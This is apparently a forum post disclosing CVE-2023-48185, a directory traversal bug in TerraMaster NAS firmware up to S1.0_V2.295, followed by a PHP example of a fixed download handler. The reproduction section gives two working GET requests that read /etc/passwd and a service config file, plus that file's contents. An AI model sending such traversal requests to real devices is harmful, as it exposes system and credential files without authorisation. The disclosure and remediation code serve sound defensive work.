
CVE-2023-48185: Arbitrary file download vulnerability in TerraMaster_S1.0_V2.295 - National Professional-Grade NAS -- TerraMaster Official Forum

Directory Traversal vulnerability in TerraMaster v.s1.0 through v.2.295 allows a remote attacker to obtain sensitive information via a crafted GET request.


Arbitrary file download vulnerability in TerraMaster_S1.0_V2.295

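Vulnerability details
On the TERRA MASTER F2-NAS2, system versions ≤ TerraMaster_S1.0_V2.295 have an arbitrary file download vulnerability. Through this vulnerability, any file present on the system can be read. I hope the vendor fixes it promptly.
Reproduction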
http://[]:8181/cgi-bin/filemanage/download.php?file=%2Fetc%2Fpasswd
http://[]:8181/cgi-bin/filemanage/download.php?file=%2Fetc%2Fserviceconf.xml
File contents:
<root>
<GLOBAL_PARAM LeafId="0">
<!-- GET_GLOBAL_INFO -->
<sName>monitor</sName>
</GLOBAL_PARAM>
<SERVER_PARAM LeafId="1">
<sSWITCH>on</sSWITCH>
<!-- GET_SERVICE_INFO -->
<sSERName>/usr/sbin/utelnetd</sSERName>
<sSERVERSTARTPARM>-p 23</sSERVERSTARTPARM>
<!-- 0:kill,1:start,2:monitor,3:start&monitor -->
<iOPERATIONTYPE>3</iOPERATIONTYPE>
<!-- the interval time of monitoring,such as 30 -->
<iINTERVALTIME>30</iINTERVALTIME>
<!-- reboot the service time,such as HH:MM -->
<sREBOOTTIME>00:00</sREBOOTTIME>
</SERVER_PARAM>
</root>
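Note that even if the file is specifically set to 644 (guest access prohibited), it can still be downloaded by guest.
Remediation
1. Add authentication logic to download.php when it serves a file.
2. Prevent directory traversal by using the mnt directory as the starting point.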
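
Both remediation steps in PHP, as an added example that is not TerraMaster's code. The `/mnt` root comes from the post; the `$_SESSION['user']` login marker and the helper name `resolve_under_root` are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not TerraMaster's code. Assumed: shares live under /mnt and
// a logged-in session carries the account name in $_SESSION['user'].
const SHARE_ROOT = '/mnt';

/**
 * Return the canonical path of $requested if it is a regular file under
 * $root once symlinks and ".." segments are resolved; otherwise null.
 */
function resolve_under_root(string $requested, string $root): ?string
{
    if (strpos($requested, "\0") !== false) {
        return null; // realpath() rejects NUL bytes; refuse them up front
    }
    $rootReal = realpath($root);
    // Treat the request as relative to the root: "/etc/passwd" -> "<root>/etc/passwd".
    $real = realpath($root . '/' . ltrim($requested, '/'));
    if ($rootReal === false || $real === false) {
        return null; // root or target does not exist
    }
    // Compare with a trailing slash so "/mnt2/x" never matches root "/mnt".
    $prefix = rtrim($rootReal, '/') . '/';
    if (strncmp($real, $prefix, strlen($prefix)) !== 0 || !is_file($real)) {
        return null;
    }
    return $real;
}

// Fix 1: require a login before touching the filesystem.
session_start();
if (empty($_SESSION['user'])) {
    http_response_code(401);
    exit;
}

// Fix 2: accept only a string parameter that resolves inside SHARE_ROOT.
$file = $_GET['file'] ?? null;
$path = is_string($file) ? resolve_under_root($file, SHARE_ROOT) : null;
if ($path === null) {
    http_response_code(404);
    exit;
}

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

The session check only establishes that someone is logged in; enforcing per-account access (the guest case in the note above) additionally needs a lookup against the NAS's own share permissions, which the post does not describe.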
